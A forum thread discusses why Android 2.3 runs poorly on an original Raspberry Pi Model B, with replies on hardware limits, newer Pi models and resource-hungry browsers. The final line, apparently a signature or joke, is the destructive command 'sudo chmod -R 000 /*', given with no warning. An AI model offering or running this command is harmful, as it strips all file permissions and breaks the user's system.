Raspberry pi model B (2011) runs awful...

Hello, I installed Android 2.3 on my RasPi Model B but it's too slow to use. Everything doesn't run smooth (I can not even use the mouse properly).

Does anyone know the problem?

My thought would be that it is either the software being too slow or incompatible with your mouse, or the raspberry pi can't handle something that demanding.

Picked up a 3b+ a few weeks back to run a wallet for staking coins.

I can run the wallet and a terminal, nothing else.  To open Cromium for browsing I have to shut the wallet down.

They aren't powerful enough to do much desktop stuff with.

Chrome uses a lot of resources.  "TheGlenlivet" can you install and run FireFox?

A gen 2 pi is a lot more powerful being a quad core instead of a single and double the ram of the first gen

System specs:

4790k

GTX 1050

16GB DDR3

Samsung evo SSD

a few HDD's

30$ 7 years ago I might add...

Android is pretty resource heavy, it's not surprising that it doesn't run well. Stick to raspbian.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*
